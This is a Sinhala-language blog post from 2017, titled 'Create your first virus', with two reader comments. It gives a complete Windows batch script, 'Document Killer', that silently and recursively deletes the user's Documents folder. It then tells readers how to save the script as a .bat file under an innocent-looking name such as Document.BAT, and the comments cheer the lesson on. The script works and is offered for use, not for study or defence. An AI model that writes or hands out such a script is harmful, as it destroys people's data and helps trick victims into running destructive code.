Thursday, October 5, 2017

Create your first virus (වයිරස් හදමු ප්‍රථම පාඩම.)



වයිරස් එකක් කියන්නෙ මොකක්ද කියල හැදින්වීමෙදී කියල දුන්න ඔයාලට මතක ඇති කියල මම හිතනව.
ඉතින් දැන් අපි බලමු වයිරස් එකක් නිර්මාණය කරන්නේ කොහොමද කියල.ඇත්තටම මෙතනදී මම ඔයාට දෙන්න යන්නේ සරල ගනයේ වයිරස් එකක් සරලවම කියුවොත් මේ වයිරස් එකෙන් වෙන්නේ මේකයි. ඔයාගෙ පරිගණකයේ  Document කියල ෆෝල්ඩර් එකක් තියෙනව නේද...? ඉතින් මේකෙන් අන්න ඒකට තමයි වැඩේ දෙන්නෙ ඉතින් මේක කවුරුහරි රන් කලොත් එයාගෙ පරිගණකයේ  Document එක  Delete වෙනව. ඒ වගේම තමයි Document එක  ඇතුලෙ තියෙන හැමදේම මේකෙන් Delete වෙනව.
එහෙනම් වැඩේට බහිමු.
ඔයා දන්නව ඇතිනේ අපි මේ වැඩේට ගන්නේ නෝට් පෑඩ් (note pad) එක කියල. එහෙනම් පහත රතු පාටින් දීල තියෙන කෝඩ් එක නෝට් පෑඩ් එකට  copy, past කරගන්නකෝ...

@echo off
color c
title ~      Document Killer     ~     Presented By Pariganaka Lookayoo     ~
cd c:\users
attrib -h -s -r -a %userprofile%\documents
del %userprofile%\documents /s /q
exit

දැන් File මෙනු එක ක්ලික් කරල එන මෙනු එකෙන් Save As කියන විකල්පය තෝරන්න.
Save As කලාම එන Box එකෙහි File name එකට ඔයා කැමති නමක් දීල අගට" .bat " කියන file extinction එක  type කරල  save ක්ලික් කරන්න.

උදාහරණයක් විදියට ඒක මම Document.BAT කියල save කරනව.

5 comments:

  1. ඕනම කෙනෙක්ට ලේසියෙන්ම තේරුම්ගන්න පුළුවන්. සුපිරි වැඩක් ආ එළම.
    තව දාපන්

    ReplyDelete
    Replies
    1. අනිවාරෙන්ම දාන්නම්.
      ලිපි කියවන ඔයාල තමයි අපේ ශක්තිය

      Delete

Thank you for you comment